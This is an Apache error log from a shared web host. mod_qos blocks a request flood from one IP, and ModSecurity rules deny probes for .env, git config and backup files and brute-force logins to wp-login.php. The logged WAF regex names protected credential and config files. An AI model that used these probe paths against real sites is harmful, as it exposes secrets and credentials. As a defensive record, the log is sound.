[Tue May 26 19:54:21.190718 2026] [qos:error] [pid 86490:tid 86668] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7XQAAALU
[Tue May 26 19:54:21.190817 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7XgAAAKM
[Tue May 26 19:54:21.190867 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPigAAADA
[Tue May 26 19:54:21.290852 2026] [security2:error] [pid 86490:tid 86651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K62AAAAKQ"]
[Tue May 26 19:54:21.302965 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE0qK9k_ZUB2Vp25HwwAAAbI"]
[Tue May 26 19:54:21.310744 2026] [security2:error] [pid 86490:tid 86634] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K6xAAAAJM"]
[Tue May 26 19:54:21.313126 2026] [security2:error] [pid 86490:tid 86641] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K63AAAAJo"]
[Tue May 26 19:54:21.319211 2026] [security2:error] [pid 93868:tid 94351] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE0qK9k_ZUB2Vp25HxAAAAew"]
[Tue May 26 19:54:21.328458 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE0qK9k_ZUB2Vp25HvQAAAgI"]
[Tue May 26 19:54:21.328727 2026] [security2:error] [pid 86490:tid 86726] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K65wAAAO8"]
[Tue May 26 19:54:21.331847 2026] [security2:error] [pid 93868:tid 94345] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE0qK9k_ZUB2Vp25HyAAAAeY"]
[Tue May 26 19:54:21.332805 2026] [security2:error] [pid 93576:tid 93767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE2DRMqfxdEDkoszPTgAAADc"]
[Tue May 26 19:54:21.334966 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K64QAAANw"]
[Tue May 26 19:54:21.336829 2026] [security2:error] [pid 86490:tid 86622] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K64AAAAIc"]
[Tue May 26 19:54:21.347228 2026] [security2:error] [pid 86490:tid 86699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K62wAAANQ"]
[Tue May 26 19:54:21.348955 2026] [security2:error] [pid 93868:tid 94331] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE0qK9k_ZUB2Vp25HxgAAAdg"]
[Tue May 26 19:54:21.351512 2026] [security2:error] [pid 93868:tid 94381] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE0qK9k_ZUB2Vp25HwAAAAgo"]
[Tue May 26 19:54:21.380434 2026] [security2:error] [pid 86490:tid 86662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFFZMwN0DpLVWo6K7LAAAAK8"]
[Tue May 26 19:54:21.387873 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFEqK9k_ZUB2Vp25H4wAAAak"]
[Tue May 26 19:54:21.388859 2026] [security2:error] [pid 86490:tid 86711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFFZMwN0DpLVWo6K7JwAAAOA"]
[Tue May 26 19:54:21.388882 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE0qK9k_ZUB2Vp25HxwAAAas"]
[Tue May 26 19:54:21.389860 2026] [security2:error] [pid 93576:tid 93713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPcAAAAAE"]
[Tue May 26 19:54:21.413955 2026] [security2:error] [pid 86490:tid 86660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K6_AAAAK0"]
[Tue May 26 19:54:21.424915 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFFZMwN0DpLVWo6K7QQAAANE"]
[Tue May 26 19:54:21.425048 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFEqK9k_ZUB2Vp25H2wAAAe4"]
[Tue May 26 19:54:21.425939 2026] [security2:error] [pid 86490:tid 86644] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFFZMwN0DpLVWo6K7NgAAAJ0"]
[Tue May 26 19:54:21.437616 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPdAAAAAM"]
[Tue May 26 19:54:21.439728 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFFZMwN0DpLVWo6K7KAAAAPA"]
[Tue May 26 19:54:21.443475 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPYAAAABY"]
[Tue May 26 19:54:21.446553 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPZAAAAFs"]
[Tue May 26 19:54:21.448816 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPbQAAAGA"]
[Tue May 26 19:54:21.450444 2026] [security2:error] [pid 86490:tid 86682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K66wAAAMM"]
[Tue May 26 19:54:21.566122 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7lQAAAPo
[Tue May 26 19:54:21.584737 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPnwAAAH0
[Tue May 26 19:54:21.587507 2026] [qos:error] [pid 86490:tid 86736] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7lgAAAPk
[Tue May 26 19:54:21.587657 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPoAAAAC0
[Tue May 26 19:54:21.589886 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7lwAAAPs
[Tue May 26 19:54:21.593298 2026] [qos:error] [pid 93576:tid 93778] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPoQAAAEI
[Tue May 26 19:54:21.594975 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPogAAACc
[Tue May 26 19:54:21.599143 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7mAAAALY
[Tue May 26 19:54:21.601755 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7mQAAAM4
[Tue May 26 19:54:21.607782 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7mgAAAJg
[Tue May 26 19:54:21.704227 2026] [security2:error] [pid 86490:tid 86687] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/myapp/.env"] [unique_id "ahWtFVZMwN0DpLVWo6K7nQAAAMg"]
[Tue May 26 19:54:21.720930 2026] [qos:error] [pid 86490:tid 86717] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7ngAAAOY
[Tue May 26 19:54:21.736034 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPowAAABo
[Tue May 26 19:54:21.736804 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7oAAAAPM
[Tue May 26 19:54:21.739158 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7oQAAAIg
[Tue May 26 19:54:21.740894 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPpAAAAH4
[Tue May 26 19:54:21.742323 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPpQAAAB8
[Tue May 26 19:54:21.752767 2026] [qos:error] [pid 93576:tid 93799] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPpgAAAFc
[Tue May 26 19:54:21.754213 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7ogAAAMs
[Tue May 26 19:54:21.763366 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7owAAAQQ
[Tue May 26 19:54:21.771535 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7pAAAAPE
[Tue May 26 19:54:21.783280 2026] [security2:error] [pid 93868:tid 94215] [remote 92.205.188.156:49080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IFwAB6mc"]
[Tue May 26 19:54:21.865480 2026] [security2:error] [pid 86490:tid 86718] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.git/config~~.bak"] [unique_id "ahWtFVZMwN0DpLVWo6K7pgAAAOc"]
[Tue May 26 19:54:21.871805 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7qQAAAK8
[Tue May 26 19:54:21.886240 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPpwAAAB4
[Tue May 26 19:54:21.887845 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7qwAAALg
[Tue May 26 19:54:21.888745 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7rAAAAI8
[Tue May 26 19:54:21.890309 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPqAAAAHI
[Tue May 26 19:54:21.896037 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPqQAAAHo
[Tue May 26 19:54:21.904427 2026] [qos:error] [pid 93576:tid 93753] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPqgAAACk
[Tue May 26 19:54:21.914429 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7rQAAAMI
[Tue May 26 19:54:21.915703 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7rgAAAKE
[Tue May 26 19:54:21.923784 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7rwAAAOA
[Tue May 26 19:54:22.026315 2026] [security2:error] [pid 86490:tid 86640] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/prod/.env.bak"] [unique_id "ahWtFlZMwN0DpLVWo6K7sAAAAJk"]
[Tue May 26 19:54:22.029013 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7sQAAANc
[Tue May 26 19:54:22.036256 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7sgAAAPQ
[Tue May 26 19:54:22.038360 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszPqwAAAEk
[Tue May 26 19:54:22.038887 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7swAAAPg
[Tue May 26 19:54:22.039337 2026] [qos:error] [pid 93576:tid 93802] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszPrAAAAFo
[Tue May 26 19:54:22.050952 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszPrQAAAFE
[Tue May 26 19:54:22.054396 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszPrgAAACY
[Tue May 26 19:54:22.055504 2026] [security2:error] [pid 93868:tid 94217] [remote 92.205.188.156:49080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWtFUqK9k_ZUB2Vp25IGQABs2g"], referer: https://theafterglow-centre.com/wp-login.php
[Tue May 26 19:54:22.066304 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7tAAAAJ0
[Tue May 26 19:54:22.068089 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7tQAAAKk
[Tue May 26 19:54:22.074930 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7tgAAAQA
[Tue May 26 19:54:22.186381 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszPrwAAADg
[Tue May 26 19:54:22.186585 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7wQAAAI0
[Tue May 26 19:54:22.187092 2026] [qos:error] [pid 93576:tid 93768] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszPsAAAADg
[Tue May 26 19:54:22.188452 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:35314] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7wgAAAJ8
[Tue May 26 19:54:22.196439 2026] [qos:error] [pid 86490:tid 86737] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7wwAAAPo
[Tue May 26 19:54:22.205502 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszPsQAAAAA
[Tue May 26 19:54:22.210714 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFmDRMqfxdEDkoszPsgAAAGM
[Tue May 26 19:54:22.218865 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7xgAAAPs
[Tue May 26 19:54:22.220327 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7xwAAALY
[Tue May 26 19:54:22.224440 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFlZMwN0DpLVWo6K7yQAAAJg
[Tue May 26 19:54:22.282550 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPYwAAACE"]
[Tue May 26 19:54:22.283374 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtFGDRMqfxdEDkoszPYgAAAHs"]
